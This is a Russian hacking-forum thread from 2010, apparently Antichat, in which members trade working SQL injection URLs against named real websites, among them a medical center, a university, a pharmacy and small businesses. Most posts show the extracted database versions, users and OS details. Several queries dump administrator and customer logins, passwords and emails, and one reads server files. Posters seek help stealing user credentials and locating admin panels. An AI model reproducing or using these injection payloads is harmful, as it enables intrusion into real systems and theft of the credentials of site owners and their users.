Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.05.2010, 22:12
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Код:
http://www.gdnet.org/cms.php?id=conference_details&conference_id=-11%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
User: browse@cweb3
Database: gdnet
Version: 5.0.45
Вот здесь же есть таблица с юзерами, но не могу вывести данные.
http://www.gdnet.org/cms.php?id=conference_details&conference_id=-11%27+union+select+1,2,group_concat%28column_name% 29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29+from+information_schema.c olumns+where+table_name=%27users%27--+
Кто знает как вывести логин;пасс юзера напишите в ПМ. |
|
|
24.05.2010, 23:05
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
Сайт: http://www.erf.org.eg
ТИЦ: 10
PR: 7
Пример запроса:
Код:
http://www.erf.org.eg/cms.php?id=conferences_details&conference_id=-2+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--+
version - 4.1.20
user - root@localhost
database - newerf
os - redhat-linux-gnu
============================================
Сайт: http://www.code-corner.com
ТИЦ: 0
PR: 6
Пример запроса:
Код:
http://www.code-corner.com/cms.php?id=portfolio_listing&company_category_id=-3+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os),2,3,4,5,6,group_concat(0x0b,username,0x3a,pass,0x3a,email),8,9,10,11,12,13,14,15+from+admin--+
version - 5.1.41
user - corners_corners@localhost
database - corners_corners
os - unknown-linux-gnu
============================================
Сайт: http://english.anqahe.org
ТИЦ: 0
PR: 5
Примеры запросов:
Код:
http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,now(),7,group_concat(0x0b,username,0x3a,pass),9,10,11,12,13+from+admin--+
http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,now(),7,group_concat(0x0b,username,0x3a,pass),9,10,11,12,13+from+users--+
http://english.anqahe.org/cms.php?id=news_details&news_id=-8+union+select+1,2,3,4,5,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),7,group_concat(0x0b,email),9,10,11,12,13+from+member--+
version - 5.1.41
user - anqahe_anqahe_en@localhost
database - anqahe_anqahe_en
os - unknown-linux-gnu
============================================
Сайт: http://www.humanas.unal.edu.co
ТИЦ: 10
PR: 5
Пример запроса:
Код:
http://www.humanas.unal.edu.co/cms.php?id=940+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+
version - 5.1.42-log
user - accesocms@www.humanas.unal.edu.co
database - cms
os - unknown-freebsd
============================================
Сайт: http://www.bota.org.uk
ТИЦ: 0
PR: 4
Пример запроса:
Код:
http://www.bota.org.uk/cms.php?id=-93'+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15--+
version - 4.1.20
user - bota@localhost
database - bota
os - redhat-linux-gnu
============================================
Сайт: http://www.aptekaslonik.pl
ТИЦ: 0
PR: 4
Пример запроса:
Код:
http://www.aptekaslonik.pl/index.php?c=483)+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)))--+
version - 5.0.32-Debian_7etch8
user - aptekaslonik@localhost
database - aptekaslonik
os - pc-linux-gnu
============================================
Сайт: http://www.autismbuddy.com
ТИЦ: 0
PR: 4
Пример запроса:
Код:
http://www.autismbuddy.com/cms.php?id=-2+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+
version - 4.1.22-standard
user - autism_autism@localhost
database - autism_myautismbuddy
os - pc-linux-gnu
============================================
Сайт: http://meirmedicalcenter.org
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://meirmedicalcenter.org/cms.php?id=-8+union+select+1,group_concat(0x0b,version(),0x0b,user(),0x0b,database(),0x0b,@@version_compile_os,0x0b,admin_userid,0x3a,admin_password),3,4,5,6,7,8,9+from+tbl_admin--+
version - 5.0.91-log
user - mmcdb@68.178.254.230
database - mmcdb
os - unknown-linux-gnu
|
|
|
|
25.05.2010, 16:59
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сайт www.k-rabota.ru
Код:
http://www.k-rabota.ru/resume/index.php?id=560+and+substring%28version%28%29,1,1%29=5--+
===========================================
Это Blind sql-injection
version() - 5.1. ... (дальше не стал определять)
user() - k-rabota@localhost
database() - k-rabota
os - portbld-freebsd
Последний раз редактировалось mr.celt; 25.05.2010 в 17:15..
|
|
|
|
25.05.2010, 17:09
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
Сайт: http://www.liveauctiontalk.com
ТИЦ: 0
PR: 3
Код:
http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,group_concat(0x0b,login_id,0x3a,password),6,7,8,9,10+from+lat_admin--+
http://www.liveauctiontalk.com/cms.php?id=-12+union+select+1,2,now(),4,group_concat(0x0b,customer_id,0x3a,password,0x3a,email),6,7,8,9,10+from+lat_customer--+
version - 5.0.77
user - liveauction@204.12.36.28
database - liveauction
os - redhat-linux-gnu
==========================================
Сайт: http://www.thebomarestaurant.com
ТИЦ: 0
PR: 1
Код:
http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+distinct+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,vfsl_mem_email)+from+vfsl_member--+
http://www.thebomarestaurant.com/cms.php?id=-17'+union+select+1,2,group_concat(0x0b,vfsl_adm_log_id,0x3a,vfsl_adm_pass,0x3a,vfsl_adm_email)+from+vfsl_admin--+
version - 5.0.26-standard-log
user - dbvfsl@202.191.42.18
database - vfsl
os - pc-linux-gnu
==========================================
Сайт: http://ricebrokeronline.com
ТИЦ: 0
PR: 1
Код:
http://ricebrokeronline.com/cms.php?id=-3+union+select+1,2,3,group_concat(0x0b,user_name,0x3a,password),5,6,7,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)+from+administrator--+
version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBRICEBROKER
os - UNKNOWN-LINUX-GNU
==========================================
Сайт: http://e-ricelab.com
ТИЦ: 0
PR: 1
Код:
http://e-ricelab.com/cms.php?id=-4+union+select+1,2,3,group_concat(0x0b,user_name,0x3a,password),5,6,7,concat_ws(0x0b,version(),user(),database(),@@version_compile_os)+from+administrator--+
version - 5.1.46-LOG
user - TUGLOBEX_RICEBRO@LOCALHOST
database - TUGLOBEX_DBERICELAB
os - UNKNOWN-LINUX-GNU
|
|
|
|
25.05.2010, 18:32
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
http://www.ry7.ru/index.php?s=-58+union+select+group_concat(0x0b,TABLE_NAME)+from +information_schema.tables--
|
|
|
|
25.05.2010, 20:32
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+select+concat_ws(char(58),@@vers ion,user(),database(),@@version_compile_os),2,3,4, 5+--
version : 4.1.22-log
user : u15962@localhost
database : u15962
os : portbld-freebsd6.2
ненашёл таблицу с именами юзверей только pwd
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+select+group_concat(pwd,0x3a+SEP ARATOR+0x0b),2,3,4,5+from+users+--
есть доступ к чтению файлов
http://www.sellbrand.ru/user/account.php?area=public&action=fr_search_view&fid= 196&uid=-167+and+1=2+union+select+load_file(0x2f686f6d652f) ,2,3,4,5+from+users+--
|
|
|
|
26.05.2010, 16:42
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
Сайт: http://www.wifiarab.com
ТИЦ: 0
PR: 3
Код:
http://www.wifiarab.com/module.php?id=-5+union+select+concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),2--+
http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strUsername,0x3a3a,strPassword),2+from+tbladmin--+
http://www.wifiarab.com/module.php?id=-5+union+select+group_concat(strEmail,0x3a3a),2+from+tblemaillist--+
version - 5.0.91-log
user - wifiarab@68.178.254.187
database - wifiarab
os - unknown-linux-gnu
==========================================
И 2 блайнда =\
==========================================
Сайт: http://www.plastic-jeunesse.ru
ТИЦ: 100
PR: 4
Код:
http://www.plastic-jeunesse.ru/php/content.php?id=1041+and+substring(version(),1,1)=5--+
version - 5.x
==========================================
Сайт: http://www.urolocus.ru
ТИЦ: 450
PR: 3
Код:
http://www.urolocus.ru/php/content.php?id=219+and+substring(version(),1,1)=5--+
version - 5.x
Последний раз редактировалось aka_zver; 05.06.2010 в 22:19..
|
|
|
|
26.05.2010, 19:57
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.torus.com.au/index.php?page=games&id=-53+union+select+1,concat_ws(char(58),user,password ),3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user+whe re+user=char(119,119,119)
user() : www@localhost
version() : 5.0.77
database() : website
OS: красная шапочка
File_priv : Y
PR-4
|
|
|
|
26.05.2010, 21:33
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181
Репутация:
688
|
|
Это за хоккей 
Код:
http://www.bma.cz/forum/forum.php?id=-4+union+sele ct+1,concat_ws(0x3a,v ersion(),database(),user()),3,4,5,6--
Database Version : 4.1.21-log
Database name : bma_cz
User : bma_cz@localhost
OS : pc-linux-gnu
----------------------------------------
Код:
http://www.drsteiner.cz/en/detail.php?id=-32+union+select+1,concat_ws(0x3a,version(),database(),us er( )),3,4,5,6,7,8,9,10,11,12,13,14,15--
Database Version : 5.0.32-Debian_7etch12-log
Database name : drsteiner
User : drsteiner@setebos.czechia.com
OS : pc-linux-gnu
Логин и пасс в админку детские 
----------------------------------------
Код:
http://www.schnauzer.cz/chst_raz.php?id=-4+union+select+1,concat_ws(0x3a,version(),databa se(),us er()),3,4,5,6,7,8,9,10,11--
Database Version : 4.0.24'-Max'-log
Database name : schnauzercz
User : schnauzercz@thor
OS : mandrake-linux-gnu
Последний раз редактировалось f1ng3r; 26.05.2010 в 21:42..
|
|
|
|
26.05.2010, 23:14
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666
Репутация:
439
|
|
Код:
http://www.zou.ru/popup.php?id=-1184+union+select+concat_ws(0x3a,database(),version(),user()),2,3+from+users%20--
Database: 111
Version: 5.5.0-m2-community
User: zou@localhost
PR: 4
ТИЦ: 300
нашёл пароли, но не могу найти админку. гляньте, может кому повезёт. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
